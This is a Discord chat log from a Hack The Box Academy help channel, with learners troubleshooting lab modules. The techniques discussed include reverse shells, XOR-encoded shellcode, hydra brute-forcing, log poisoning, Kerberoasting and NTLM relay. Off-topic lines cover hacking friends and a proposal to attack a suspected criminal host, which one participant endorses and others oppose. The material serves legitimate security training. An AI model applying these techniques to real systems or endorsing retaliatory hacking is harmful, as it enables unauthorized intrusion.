#modules
you're better off installing what you need as you go through Academy
some tools may also be deprecated at this point, for example CrackMapExec, which was succeeded by NetExec
yeah I heard about CME being deprecated
is it worth still using the htb version or does it not make much difference?
the only difference i've seen is some very minor visual changes
the tools are what you find in Security edition
it's not like the Pwnbox on HTB
I have been running Kali for as long as I can remember; I only moved to Parrot for ease of assistance in here
I use -fs a lot. If you don’t want to send your command in public, feel free to dm me and blur out part you don’t want to share
sweet thanks
Thanks a lot, it worked now. I think Sublime messed up the characters, so when I copy-paste, the syntax is not great... that's my only explanation for why it wasn't working properly
Ah, that happens sometimes
It's only when I copied the same command from a mate on Discord that it worked... one can go crazy
Glad you figured it out 👍
Thank you!
The past 2 problems on bash seem impossible
I know my code is right, I even copied it from the guide-through
Can't establish a reverse shell on host-01 on the Shells & Payloads assessment
Crafted a WAR shell with msfvenom and uploaded it via the Tomcat interface - not sure about LHOST - does it have to be ens192? - any hints?
but it just won't budge (the following picture is the problem, although others have also not been possible)
for reference, my code is the following
module and section?
Bash one I think.
yeah, I just want people to include it as a habit so I don't have to keep asking
LHOST should be the IP of the internal interface
code seems fine, right?
iirc in the SSTI section in module 145 there used to be a part guiding you to achieving RCE with string and it is gone. Did the section get removed or relocated elsewhere?
the newlines count as characters
removed them from everywhere
still nothing
what do i do 😭
then you should look at the exercise script again
i did
i even copied the step by step one, i have it right
but you did echo -n and the exercise script is var=$(echo $var | base64)
if you say so
already tried without it
I already tried without it and it still didn't work,
I'm so puzzled
it is puzzling and the whole thing is quite abstract as all is b64 encoded. Maybe just try again from what's given in the exercise, then you can modify and try to get the same result another way.
i even tried to make it "just be on the string, no limit of how big it is" and still nothing
it's so weird
did you read the hint?
yep
I tried that too, I tried that way
I even tried echo "ANYTHING", it just doesn't
what's the procedure here
when you do echo -n, your first $var may not be correct to find the $value inside it
i removed the -n
still nothing
I feel like the HTB exercise is wrong
like, it's outdated or something, idk
so now you have to review your if-then statement
dude
it's correct, I know it's correct
even tried this, doesn't output anything
i even copied the answer
the actual answer, and nothing
wdym you copied the answer
from the guide-through
the detailed explanation
I feel like even if I did the decoding by hand, I wouldn't find the substring
well, in the provided script is there echo -n?
no
but again, i tried without it
that does output things
I'm gonna cat the var into a file and Ctrl-F
no
I just ran it
this does not output anything to me
Mac terminal isn't bash afaik
why are you running it on mac tho, there's a pwnbox for you to use
I'm gonna run it online
dude it works
for once in my life my code was actually right
thank you 2
Oh, when they say "I got nothing"... it was literally nothing... I didn't think about that
so that's why ISP support always asks: is your router on?
Turning it off and on again is actually a legit troubleshooting step
mac defaults to zsh now but with the shebang it should be bash
idk what the problem is
just Mac things ig
Sup guys
whats up..
Just got banned from a server for hacking 😔
Now I have nothing to do
I hacked all my friends already
sure thing bud
Hi 👋
That bio 🥲
i don't even want to think about whether it's bait or not
ah lol, the experience dropped from 10 to 7 years. Probably too obvious to have experience >= age
Hell nah this is what I was banned for
Ok sorry bro
No bro wdym
I had a typo
Okay I am 20 bro
But hacking others isn't what we do here
Ik
K so I suggest following rules
Okay
And taking conversation to the relevant place, not a channel that's for helping with htb academy
Okay
@hoary vine Sir, be a good guy or
on the way with
!
Bro I am 20
Okay 👍
Let's not continue this @naive sage
Is he a mod
No
Okay
But again, let's not continue this conversation
And stop flooding this channel with useless chatter
There's an appropriate channel for just chatting
How many people are here
Okay 👍
Sure.
Guys did anyone hear about tracker.qu.ax?
As far as I can tell it's trying to infect my PC and I'm planning to take revenge on the cybercriminals
It's trying to connect the worm
On port 6969
Very adultlike btw
And I did an nmap scan and it's leading me to all sorts of hosts including a bitcoin address
What are the ethical boundaries?
Can I just attack a black hat org?
I don't see why not
Hi, I'm having difficulty finding the right answer to the question of total number of installed packages in target system (Mod: Linux Fundamentals; Section: File Descriptors and Redirections).
I have tried to use the knowledge provided in the section and have researched other ways of finding the required information, but I just keep coming up with all but the right integer. I would appreciate some guidance.
What have I done?
Listed all installed packages using APT commands and piping result to wc -l;
used find to list all files and filter through wc -l (here, it is not possible for me to know how to filter file-types, so the total for number of installed packages will be incorrect).
look at the start of the apt command without wc -l; there are extra lines you need to account for
Not the channel for this
Read and follow #welcome to access more channels
@next bronze I shall do as you suggest, but how do I count what may be 'extra lines' with wc?
I've been a member since 2018 on the site; I'm not new, but I don't really interact with the mods/users
you just change the number once you get it
That's not my problem, this channel is for help with academy modules
Ok
It’s illegal
Cool. But the law will not do anything for the moment
This conversation isn't for this channel
If it helps stop criminals?
Still illegal
If I murder a murderer I will still go to jail
Ohh
Very threatening
Two wrongs don’t make a right
Unless you're the executioner
That's not the same
Still the same thing really
Touché
Anyway; <@&861185840277487616> before this continues off the rails
I'm stopping a malicious activity and the pc is used for evil and stopping it will not cause any disruptions
It was an analogy..
Well it's a bad one
Mate have at it
Like I said it’s illegal, idgaf
Have fun getting caught
Gee man are you always this cocky?
Are you always this stubborn?
Just trying to keep this channel on-topic
Report the domains to the feds
But if you got infected 9/10 times you downloaded and ran something you shouldn't
Please keep the topic according to the channel description
@next bronze I'm saying 'sorry' to myself, but, I tried your suggestion, but it yielded nothing. I tried APT with and without options; I do not get the correct figure. I'm missing something outside of the package manager installations, but I don't know what.
sudo apt list --installed will do it, make sure you have ssh'd into the target
@next bronze I have used those commands several times; they provide the wrong answer. So, I'm missing something, but what?
well as I've said, look at the start of the apt command without wc -l; there are extra lines you need to account for
@next bronze I did as you suggested and could find no extra lines. sudo generates an incident report, as I am not in the sudoers file.
@naive field Were you talking about the last question in Windows Event Logs and Finding Evil? The last question of the second section says to replicate the attack
You don't need sudo to list
@next bronze I'll just have to leave the question and unfortunately, fail the module. Such is life.
Hey gents any dark websites
uwot
yess mimikatz
Don't use sudo
but nothing pops up in Sysmon
Just apt list --installed
Have you gone to the C:\Tools directory and run mimikatz? @naive field
oh it won't let you sudo anyways
It doesn't require it anyway
Well I'm just watching pirated Netflix because f$ck Netflix & all their other milking companies.
I lost all the respect because of their latest monstrosity with the Avatar the last airbender.
I give 0.000000000 cents for greedy cancer pigs
iirc in the SSTI section in module 145 there used to be a part walking up the import chain and achieving RCE that is gone. Did the section get removed or relocated elsewhere?
Hi sirg he's been on this for a while
Yeah. Scrolling up and I can see that.
Wdym?
Hi there. I'm new to the community here. I have a question regarding the assembly module skills assessment task 1. Is there anything with the shellcode values I extracted? The syntax is in Python btw
shellcode = [  # 8-byte hex chunks read at rdx after each XOR iteration of the decode loop
    '4831c05048bbe671',
    '167e66af44215348',
    'bba723467c7ab51b',
    '4c5348bbbf264d34',
    '4bb677435348bb9a',
    '10633620e7711253',
    '48bbd244214d14d2',
    '44214831c980c104',
    '4889e748311f4883',
    'c708e2f74831c0b0',
    '4831c05048bbe671',
    '014831ff40b70148',
    '31f64889e64831d2',
    'b21e0f054831c048',
    '83c03c4831ff0f05',
]
I combined them using ''.join() and all I get is a dollar sign and exit after entering anything. I also tried to order each extracted shellcode chunk in little endian, yet it's not working. I set a breakpoint after the xor and checked the value at rdx each time to get the shellcode. This is my assembly code:
global _start
section .text
_start:
    ; push the 14 XOR-encoded 8-byte chunks onto the stack
    ; (pushed last-to-first, so the first chunk ends up at the lowest address)
    mov rax, 0xa284ee5c7cde4bd7
    push rax
    mov rax, 0x935add110510849a
    push rax
    mov rax, 0x10b29a9dab697500
    push rax
    mov rax, 0x200ce3eb0d96459a
    push rax
    mov rax, 0xe64c30e305108462
    push rax
    mov rax, 0x69cd355c7c3e0c51
    push rax
    mov rax, 0x65659a2584a185d6
    push rax
    mov rax, 0x69ff00506c6c5000
    push rax
    mov rax, 0x3127e434aa505681
    push rax
    mov rax, 0x6af2a5571e69ff48
    push rax
    mov rax, 0x6d179aaff20709e6
    push rax
    mov rax, 0x9ae3f152315bf1c9
    push rax
    mov rax, 0x373ab4bb0900179a
    push rax
    mov rax, 0x69751244059aa2a3
    push rax
    ; decode in place: XOR every 8-byte chunk on the stack with the key
    mov rbx, 0x2144d2144d2144d2  ; XOR key
    mov rdx, rsp                 ; rdx walks the chunks from the lowest address upward
    mov rcx, 14                  ; number of 8-byte chunks to decode
loopXOR:
    xor [rdx], rbx               ; decode one chunk
    add rdx, 8                   ; advance to the next chunk
    loop loopXOR                 ; rcx-- and repeat while rcx != 0
anything wrong*
is there any staff here?
If you read and follow #welcome you can wrap command blocks in ```
And automod won't get mad at you
(It also makes it easier to parse)
Why do you need staff?
i wanna report a broken module
but on the site it's offline
and i want to move forward
#1234357888114364508 then
It's the weekend so less are online but you can send a message anyway.
I sent one, hopefully getting a reply. Thanks anyway
@fathom pendant In future, I won't.
I mean it just depends lol
Some commands do and some don't need sudo
@fathom pendant As a 'free' subscriber, I have very few privileges; sudo being one, and getting help (not that you and the forum community are not helpful - you all are).
It's nothing to do with your subscription level
It's just the way the lab is designed
@fathom pendant I get it. (Not remaining too long off-topic) I would get the hints and tips that you can only vaguely suggest, were I a paid subscriber.
Nope
Your hints and tips have nothing to do with subscription level lol
@fathom pendant If so, why am I not able to switch on the in-section help?
That's a walkthrough, for annual subscribers. But it's not required
@fathom pendant It's useful for beginners.
Not really
The walkthroughs/guides don't really explain much
So you're not learning anything except copy/paste
As the walkthrough is assuming you read the content/did some research
This module's sublesson is all about research. Linux is well documented, you can generally ask Google a question of "how to <do thing> in Linux" and you'll get a lot of results
@fathom pendant Indeed. The expectation is to have done some work before reaching out for the available help, otherwise, as you say, you're not learning anything.
There's only one question in the module that's a curveball, as it requires a bit of html knowledge, alongside regex
But there's a forum answer that details the steps
@fathom pendant I think you underestimate the amount of learning, researching to be done and the number of curveballs thrown.
Nah, most of everything else in the module is usually a <command> --help or man <command> away
The question I'm referring to requires a bit more knowledge
It involves curl
@fathom pendant You're very experienced; I'll have to take your word on it and apply myself a little more to the tasks. Good chatting with you.
Almost everything else is about as straight as it can be given to you
I only just started a couple years ago.
The modules also tend to make you use your brain to apply what you just learned to the situation
@fathom pendant You have a wealth of knowledge and experience; I started a few days ago.
Not everything is as simple as copy/paste from examples
@fathom pendant Very much like coding then: the skill is in problem solving.
Anyone who can help me with a problem?
Which module is it about?
Attacking Common Services - easy
It's not something about knowledge, or how to solve it. I am sure that I found the correct solution, but Pwnbox is not working, and neither does my Kali...
Basically, I get an error when running hydra, changed the command multiple times, still not working.
Let him help me first man xD
You're not the most important person in the room
Hmm? Only with the information “it doesn't work” it is damn difficult to help
What's your command and error?
I didn't say that. And 1st of all it was a joke, take it accordingly 🙂
Didn't read as a joke
That's what that "xD" at the end means
Sorry, I haven't worked through the NTLM Relay module yet
Again, still doesn't make it read as a joke
But that's detracting from the point
Command/error
We need those to effectively help you
Anyways, I used smtp-user-enum, I found a user. Now I am trying to run the command "hydra -l <user> -P /usr/share/wordlists/rockyou.txt ftp://<TARGET-IP>". I also tried "hydra -l <user> -P /usr/share/wordlists/rockyou.txt -f <TARGET-IP> ftp/smtp"
And the error i am getting from hydra is "[ERROR] 1 target was disabled because of too many errors
[ERROR] 1 targets did not complete"
Try fewer threads
I left it at default. I tried multiple walkthroughs for this exact challenge, and none of them worked. I tried one posted yesterday...
Do you really have the correct user name?
Yes, 100% sure
And you dropped the @domain from the user retrieved?
For FTP, no, for SMTP, yes
For ftp, drop it
Smtp also doesn't have much auth usually, you'd want to sign in to imap(s)/pop3(s)
For FTP i use only the user, for SMTP i try user@domain 🙂
Either way
I tried that also, but I get errors
Try ftp with fewer threads
As in fewer than default
Keep going lower
Like 1-2 threads
Seriously?...
Wow, next time, if you want to help someone, try to be a little bit less aggressive. Thank you, I will figure it out somehow. Have a great night!
...dude I repeated it like 3 times
The error is the ftp service shutting down due to too many connections
If you want the reason why it's failing
@fading oracle If something is not working properly, try the PwnBox. Or change the VPN server and then try again. This way you can rule out the possibility that something is not working properly with the combination of server and attack box.
Did all that
and i already verified with @next bronze that the commands i use are the ones
i have no clue
and tbh i am fed up that this happens every week
it just takes away the fun from the learning
I changed VPN 3 times
used the pwnbox too and restarted the server 12 times
Anyone that can help with Server Log Poisoning in the 'File Inclusion' module?
Whenever I am adding my php shell code into the server log via my user agent it seems to be bricking it for some reason.
I can add something like "test123" as my agent and still read it fine, but as soon as the PHP shell is put in I can't get it to come back or get any output.
Tried using browser/burp/curl... I'm probably missing something dumb but no idea at the moment.
Has he solved the module? Maybe he can try it from his side.
he solved it yes
Note the quotation marks and think about which quotation marks have what effect in the log file
Got it working now, Thanks for that. Need to keep that in mind for any future payloads!
Howdy, I could use some help please.
I'm trying to finish up AD Enumeration & Attacks - Skills Assessment Part II
||I have c*, am logged into ms01 as that user. Whenever I try to run any commands against the domain they fail, I have tried using powerview, it fails, tried changing password with net user, it fails, tried adding users to the domain admins group, fails. winrm & rdp fail for dc01 with that user.|| I'm not sure what to shoot for now.
Spoiler on user you can just abbreviate it to c*
I edited it. I had it in spoiler tags, so I thought that was fine.
Spoiler tags don't really do much
As anyone can click them anyway (or even turn them off in settings)
is anyone else having trouble spawning targets? Active Directory Enumeration & Attacks - DCSync. It's been trying to spawn for over 30 minutes. I have tried logging out and back in, didn't help...
Try a different VPN?
Trying now to see if it works, will let you know.. thx
Doesnt seem to be working....
Have you tried restarting the lab?
Yeah... I can try again though...
Feel free to PM if you are still having issues
Thanks
Module Shells and Payloads, Infiltrating Unix/Linux - Question: Exploit the target and find the hostname ....
The step-by-step solutions don't include the solution for this question.
are you looking for someone to give you the answer or are you stuck on something and have a question?
@next bronze Just an update. I followed another path to listing installed packages and to my surprise, the amount had changed! Now I have to wait until later this morning to find out if it is the correct answer.
Regardless, thanks for your help.
hmmm? the command I gave you earlier definitely works, you'll just need to -1 from the result
i'm taking the InfoSec Foundations path and i'm in the Setting Up module. Are we supposed to be creating our file tree in bash, downloading all these apps, and preparing everything mentioned here now?
I'm asking because it's not explicitly telling us to... it's just mentioning these tools
no, they're just suggestions on what you can use in the process
ah ok, so they will be clear when something is required?
but I'd highly recommend starting to take notes right now, it's the most important thing you can do
thank you!
you can do things your own way if you wish, those are just suggestions
hi everyone, i have a question about "AD Enumeration & Attacks - DCSync" module.
Where is the password provided for the RDP connection to ACADEMY-EA-ATTACK01?
I have already been given that password but was not sure where it is provided.
Maybe you shouldn't be copy pasting your way through then
hello what am I doing wrong?
Hi, can i please DM you?
Yeah sure
Is there a way to make Responder work over a pivot? Say I can reach MS01 directly but not DC01. After setting up a ligolo agent on MS01 to get access to the internal network, is it possible to set up listeners to capture any NTLMv2 hashes from a DC01 user using Responder on my attack machine?
im sure indeed.com has a great resolution 👍
?????? what has it got to do with indeed
you'd need to stop the smb service and forward 139 and 445 for it to work on windows
if you want to capture ntlm
<@&861185840277487616>
Thanks. I figured that'd be the case if MS01 has an SMB service running.
Whatcha got there @next bronze
Inveigh would be easier
move on
Istg if you don't finish the reference I'll be sad
I got 
oh yes a smoothie of course
it's above the questions
Yeah, that's my usual way to do it. But what about in a situation where I need to do an NTLM relay attack? I won't be able to just run ntlmrelayx on my attack machine
There's a whole setup section that gives it
for relay attacks you can generally control where the auth is sent to, so just send it to a linux host
Does HTB Academy not have a Singapore VPN?
nope
only US and EU; they do have SG Pwnbox Locations though
likely something to do with the hosts/providers for them and costs
¯\_(ツ)_/¯
I see.
I'm extremely frustrated today because RDP and SSH access are so slow.
try changing the VPN region and see if that fixes it; is it consistently slow or like randomly slow?
hey, I'm at Information Gathering - Web Edition Skills Assessment, and I'm stuck
I can't find any subdomain
if it's consistent, that might just be latency; though i've heard some people have had minor success using a vpn to access a region, then using the openvpn config through that
add -ac
wait that's gobuster
why is gobuster showing 400s?
lol
gobuster should be discarding those responses
idk
for what tool ?
i tried ffuf but it returns all of them as valid subdomains
ffuf add -ac
also with gobuster ig you can add -b "400" for it to blacklist the 400 errors
weird that it's not there by default
the other thing with ffuf is you can also filter by response size (-fs) for the most common size you see
yeah im doing it now
also dnsenum won't work as it requires DNS to be running for it to work
yes sir
and the scope of this host is ONLY the port given
I'm in Australia, so I'd like something in the region too. but it's fine for pwnbox and there are some Aus servers when doing boxes.
@rose compass @sterile solstice there is the /feedback command that sends a message directly to the HTB slack for more staff to see :) (note you won't receive much in terms of feedback on your feedback)
btw this is my ffuf command, am I doing it right?
ffuf -w /usr/share/wordlists/amass/subdomains-top1mil-110000.txt -H "Host: FUZZ.inlanefreight.htb" -u http://inlanefreight.htb:30951 -fc 405 -fs 120
don't need -fc
but it will work though
so it will automatically adjust its filters
good idea. they won't know if ppl don't ask, right, lol.
oh we've been asking
well it's not just that, as much as I love g0b and some of the staff that have caught and seen people mentioned it, it's easy for it to get forgotten about
hahaha. noted 😉
but yes do ask them more
doing it now
as most of their acad customers are in US/EU, however since it's been gaining more traction -- it never hurts to nudge them on it
also as a fwiw; the reason the pwnbox has AUS/SG servers, is because acad and lab pwnbox are both hosted via the same provider
so they already have those servers ready (on the backend) as opposed to the vpn hosting provider and such
i do love the platform, and i do hope it'll gain more traction. i know plenty who do cybersec but stick more to the typical OffSec type stuff ...
found the subdomain thanks @fathom pendant
as a forewarning; whenever you can't find something, dig another layer deeper
:) and ofc don't forget everything that was taught in the module, most come into play in some form or another
I live in Japan, and Pwnbox works without any problems. However, some modules' RDP is unstable (xfreerdp, rdesktop).
@old haven we don't do voice notes here
please type out whatever you're having issues with in academy
I have a script to help you find the best server if that helps
https://gist.github.com/Xre0uS/2105986d23719cf99c271842528f48a6
Measures latency to all HTB academy servers, requires ping3 module - measure-academy-latency.py
necessity breeds invention :)
yeap
as a side note I've been too lazy to switch back to US
that's my experience too. a VPN for Japan would be fine. It's closer than Europe haha. Or if they insist on staying in the US, how about Guam? lol
nice...!
I believe US-3 or 4 might be located in a server farm on West Coast fwiw
might be geographically closer
but I'm not a geographer
i'm pretty sure they're similar distance tbh.
i submitted feedback. will see what happens :). won't hold my breath
nice script btw. after doing the Python for DNS module, I decided to do my own (first) Python project to improve my skills. going to do an enum script to make things easier for when I do a real pentest...
that module wasn't too bad
After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb.
i used the tool in the module ReconSpider but the results are empty
do you write other scripts to help with your work? maybe HTB should have a module on what type of tasks are good for automating as a pentester lol.
which module?
I do if existing tools aren't sufficient, but generally python skills will translate well to whatever you need it for
yea, I've used it more with finance-type stuff, so I'm used to seeing pandas and dataframes. even with the project I want to do, I have the temptation to package results into a df and then write to a csv, as that's what you do with finance data... lol
nvm
I've never followed through with a proper project, which is why I thought small tools would be good to work on, to improve. even some of the POCs I've seen have been basic, and some also just don't work (older versions of Python, usually)
What is "!rank"?
yeah it can vary a lot, usually there are existing libraries you can work from in the scripts too
I mean the best way to start is just when you see something that can be automated/improved on, write a script for it
yea, like dnspython. which is a large and well constructed library.
I also did the Bash scripting module recently. that was maddening tbh; I found it super sensitive with no easy way to debug.
do you have any tips on where to learn programming? I'm halfway through CS50 intro to computer science and thinking of Codecademy after, is Codecademy any good?
I used VSCodium in my VM, but I still had issues.
I recently installed PyCharm (I've had it before but didn't have it in this VM), and since I'm still a student, I got a free professional license, so now I'll be using that.
installed the C and Java IDEs that come with it as well, in case I need them in the future
best way to learn is to make your own project, I didn't take online courses for programming, most of my knowledge comes from projects I did in school and my own personal projects
okay yeah, CS50 is all about that but it's overwhelming.
oh, I have CS50 on my list! heard it's great. but as Xre0uS says, do a project of some kind. which I know can be hard, but even doing a little bit for my own I feel like I've improved heaps.
never used pycharm but the jetbrains ide are pretty good I heard
yea, I'm not surprised. it's rated highly. I heard that even seasoned programmers get stuff out of that course, despite it being beginner friendly
I've used Anaconda on my Windows machine, but I think I'll just switch to PyCharm, I'm liking it.
@soft reef if you like to tinker, you could get a Raspberry Pi or Arduino and make a project in MicroPython. if you want something cybersec related, you could build some BadUSBs for future pentests.
I did one of those, very fun, would recommend
if you're lucky enough to have your own place, you could also go the homelab route (I don't own but I do have a homelab, it's just downsized). I haven't done it yet, but automating things at home or even standing up services can also help.
I got sidetracked when I saw a YouTube video on HTB and said "hey, I'll do CPTS", otherwise I should've been fixing my homelab. haaha
Okay well I'd be happy if I manage to write some simple brute force or fuzzing scripts.
yea! that's something I've also wondered about doing too. there'd be a million of them out there on GitHub, but building something of your own is good. try the 'Python for DNS' module. I got a few ideas from that.
yea i saw someone show off a few of them and i mentally added it to my list of future projects hahaha.
as i hinted earlier
go a little deeper
I got an issue with the sqlmap module, section Attack Tuning, first question. sqlmap can dump the contents of everything but the content of table flag5... I tried to use the switches in the hints section too, no luck, all the other tables are dumped
why would a file on an SMB share not be "get'able" when we have read permissions to the file and the share?
surely read is all the permissions you need to download files from smb shares
I read the first section on Windows Event Logs and Finding Evil slowly.
Tried hard to understand it as much as I can
But I can't understand it. Can someone give me some tips?
it should if the individual files are accessible
is it time based?
hello
is there any tool to make a list of directories by scraping the website
i remember reading about it in the academy but not really sure where
boolean-based blind
Information Gathering - Web Edition probably
shouldn't be caused by bad connection then, try again or reset the target
yeah but couldn't find it
it takes keywords from the target and forges a list of possible directories
i mean, CUPP does that for passwords .... but not sure about directories
no not cupp
crunch?
Yeah possibly
feels like a typo in the academy : https://gyazo.com/0a4648527538a8975c532d06f5717dd1
No, maybe not
they want web directories tho, not wordlists
I mean the Creepy Crawlies section has a few
my bad
That's the one
CeWL that's it
yeah
l337_h4x0rs_R_cewl
anyway i just finished the Dom Based XSS section
feels like an erratum is needed on it
No worries, thank you for noticing and reporting
you can get the Reflected XSS flag alongside the intended DOM one
unless it's intentional and I'm dumb?
¯\_(ツ)_/¯
Oh yeah it is CeWL
que sera, sera
thanks, the same command worked after spawning a new target, weird
im not sure why i cant post it in erratum
but yeah i need this
i thought there is something already made so i don't reinvent the wheel
nvm I'm an idiot 😂
must have been the wind bc now i can't get it LOL
the sqlmap module is just funky overall tbh
@ocean night coming in with the hotfix
HTML encoding to user-controlled output
The application should encode user-controlled input in the following cases:
Prior to embedding user-controlled input within browser targeted output.
Prior to documenting user-controlled input into log files (to prevent malicious scripts from affecting administrative users who view the logs through a web interface)
can someone please explain this to me
basically: always sanitize user input
i get the second part, which is regarding server log poisoning
before input is embedded via the text input, and prior to logging
but the "Prior to embedding user-controlled input within browser targeted output"
the mixing of the statements here is a bit confusing to me
ok so im user, and i input data of a sort, the data needs to be encoded before it is reflected back to me
embedding is just saying "putting it on the page"
yes
it'll html encode special characters such that what's sent back is the literal string <script>alert(window.origin)</script> instead of executing it
ahhhhhhh
so instead of embedding it in the html it will input it as plaintext to prevent it from executing
when you view page source you'll see those characters would be the <script>...
so make it plain text rather than an executable script
basically, yes
great , thank you
<script>alert(window.origin)</script> <-- this is what html encoding would do
so I guess the typo should be regarded as HTML encoding to user-controlled input rather than output, I guess
no?
I mean the web app does need to encode the user input before it is reflected
it's telling you when you would use HTML encoding in this subsection
but yeah not a typo
just a misunderstanding
is anyone got to the skills assessment in api attacks?
just ask your question
it should be straight forward
g0blin faster than flash.
keeps saying that the request is malicious or too big in size, whereas it's neither
nvm will figure it out
section?
regarding that, wouldn't URL double encoding bypass the html encoding?
who knows
@rustic sage we don't botnet around here
so its a possibility 😉
idk i'm not an expert in it ¯\_(ツ)_/¯
I'm not really interested in it
the stack is first in last out, so the order is reversed, check for each push and get each 8 bytes and work from there
Windows machines suck - very poor connections - cant establish shell with eternalblue - any hints beside changing vpn
there's no hints for that, find a server that works for you
in general are udp or tcp connections preferable?
make sure you're using the right exploit
one is just a flood attack
Are you connected via VPN?
it also helps if you provide the module and section name
im not connected via vpn and im on the linux fundamentals: "working with files and directories"
Someone can help me for DOCUMENTATION & REPORTING Q1?
but also this problem has been happening since even the first module. I just straight up cannot connect using ssh
are you using your own vm?
yes, Im on parrot OS
well then you'll need to connect to the academy vpn
All you need to know about the VPN Connection for Academy
oh ill try this right now
do I have to install openvpn to connect
it's installed by default in parrot
it says "options error: In [CMD-LINE]: 1 : Error opening configuration file: academy-regular.ovpn"
did you download the file?
yes, its saved in documents
is your current directory in documents?
Hey, in the Introduction to Windows Command Line module's Managing Services section. As mentioned in the section, to|| stop the Windows Defender service we need to be on the Local System account. ||So i gained a reverse shell from the windows target to get a Local System level permission shell on my attacking host. But when i tried to stop the service using sc stop windefend, even though I am on the System account it still denies me, why's that?
oh i see, my directory was not set to documents
I don't think you can stop it like that, it's probably defender's self protection
oh sad, i thought i could stop it like mentioned in the module's section with Local System account if i gained that(local system account) level permission.
Hi ! I have been stuck on : INTRODUCTION TO WINDOWS COMMAND LINE : on the question : For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them. I Can't Find a way to find the DC host Password. Thanks in advance ❤️
what section is this, in that module?
Skill assessment
im stuck on this running program
oh, I am not in those section yet.
the password is the previous questions answer
I tried that , it didn't work
idk whats happening i think my payload is correct but not getting the correct response
Its the password to the user7 but not the DC
you can just ssh to dc with the same account
what's the problem
but with Local System Account level privilege I can stop that right like mentioned in the section?
I thought I had to connect with ACADEMY-ICL-DC, thank you
connecting to this vpn is timing out. Its stuck on the lines that say "Timers: ping 10, ping0restart 120" & "Protocol options: explicit-exit-notify 1"
no it's meant to be running, open another terminal to do your things
it's blocked by defender itself
so no
Sorry for asking so many times. I spent a lot of time trying to get a system-level account's reverse shell from my target since I had no prior experience with getting a shell. I was so excited that I was able to implement that step. That's why I asked this time. Thanks for your response.
BRUH wth, i was trying with my burpsuite for 2 days but now i tried with pwnbox and got in single attempt
there are other ways to stop defender, just not with sc
also further modules will teach you how to get system shells and whatnot, but good job researching that yourself
For the File Transfers section, I have very high latency. Do you know how I can fix it?
Use a different server
thxs
hello on the module 176 section 1778 I'm trying to find the password of the svc-iam user but when I put it in the answer box it tells me it's incorrect even though it's the only password I get from hashcat, anybody can help me?
module name and section name; the numbers just make it take longer for people to figure it out
sure one second I'm sorry
I'm on WINDOWS ATTACKS & DEFENSE/Kerberoasting
basically I'm stuck on "Connect to the target and perform a Kerberoasting attack. What is the password for the svc-iam user?"
can i DM someone for the Bypassing Web Application Protections case#11?
well... did you connect to the target and attempt to kerberoast?
the section sounds like it should be telling you how to do so
yes I've also transferred the spn.txt file to my vm
and allegedly cracked the hashtags with hashcat
but maybe I'm just looking in the wrong place
well if it's cracked then do --show
the password will appear after the given hash
I'm sorry it's the autocorrect
I did it but the password seems not to be the one I was meant to find
well did it line up with the service-iam user?
maybe I'm just missing some steps
I thought so
So calling them hashtags now.
Did you attack the correct user?
also be sure there's no extra spaces/whitespace in your copy/paste
I think so yes but now I'll redo just to check if I did it all right
I'll check that too thanks
sorry for misspelling hashes as hashtags, it won't happen again
have a nice day
lol
WINDOWS PRIVILEGE ESCALATION / Miscellaneous Techniques
i escalated privileges, copied the sam, security and system reg to my attack host, used secretsdump, cracked it with hashcat, and in the end all they wanted was another easy command...alright....
Hi,
Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: AD Enumeration & Attacks - Skills Assessment Part II
So far, I have managed to get R** access to Mxxx server. However, I am unable to import active directory in it. This means I cannot use PowerView functions. This is creating a lot of problem for me. I am not able to perform right/permission enumeration. Is it intended? Or am I missing something while importing Active Directory module?
i remember i had used PowerView without problems
Does PowerView not have dependency of Active Directory module?
Module: DACL Attacks II
Section: Logon Scripts
Does someone have a tip for the second question of that module?
https://academy.hackthebox.com/module/255/section/2910
it has its own functions that query the domain, no need to import other modules. did you try to do some query and have problems?
hey that's me 
use Invoke-ScriptSentry
It is you
yeap did that, and found the script i need to modify
also updated the content of that bat file but cannot get the reverse
how are you updating it?
just edit it then
i will try that, but in the end it will have the same content inside, both if it gets modified in the same file and if it gets replaced with the same name. When i check the content it is modified, so it made no sense to me that i could not get the rev shell.
i will try to just modify it and let you know
Just redoing Password Attacks Skill Assessments because of lack of documentation - can i DM someone who has the solutions documented? - I just know it takes a long time to crack and i dont want i to do it again 😦
Hey guys,
does anyone know a good resource that talks about upgrading web shells to reverse shells? I mean usually it's not that complicated, but i would like to look at it a little bit more.
I mean replacing and editing can be pretty different
if you have a webshell you have command execution, so just use a one liner
This is a life saver! Thanks!
Thanks to you too😃
why in this case? the file is already in the logon script path, so its content should be executed at logon. The file has the same content, but in one case it has been modified, in the other it has been replaced with the same name, same position, and the content is the same
different metadata for one, if it's replaced
None of the commands are working 😦
well look at the errors, you don't have the rights to load them
😭
you can use another host where you have admin on
Sure.
unless there's some specific edge you want to abuse, where you're using powerview from generally does not matter as long as the machine is in the domain
Need to enumerate a little more.
Before I can do what you are suggesting. Thanks though, appreciate it 🙂
Module: Advanced Deserialization Attacks
Section: Example 1: JSON
Trying to use System.Windows.Data from PresentationFramework as per instructed in the section but does not seem to be working for me
finally finished the penetration tester path 
How do you feel after completing the path and how confident are you in pentesting early and now?
i guess some things will stick and with practice it will add up, but imo it is kinda not beneficial to try to retain 100% of that information. I feel like it is a better memory usage to recognize patterns and to know where to quickly find the info you need. Or at least that's what i say to myself to reassure me : D
ffuf -w /opt/useful/seclists/Usernames/xato-net-10-million-usernames.txt -u http://94.237.59.199:41739/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user"
Just keeps running without a result
Tried the smaller Seclists user lists also the names one with no results
Checked that it uses the same "Unknown user" response and the data format is the same.
https://academy.hackthebox.com/module/80/section/772
i've completed the path as well ,except reporting and aen. I just feel bad, not confident at all, kinda burned out... we'll see how that evolves after reviewing the whole course and notes, and more practice.
Thanks for the question. I will say that I learned a lot with the HTB academy. I started almost 3 years ago with other hacking platforms but I never took good notes. Instead, in this path I took notes of almost every module with relevant commands and descriptions, so now I feel very confident in doing challenges/boxes because I know what to try and what to look for. I'll give you an example from the last module (AEN): I was able to compromise the AD environment ALMOST blindly, I got stuck only on some edge cases, but I will say 95% I did it without the solution. My next step will be the Dante Pro Lab, also on hackthebox, for OSCP preparation
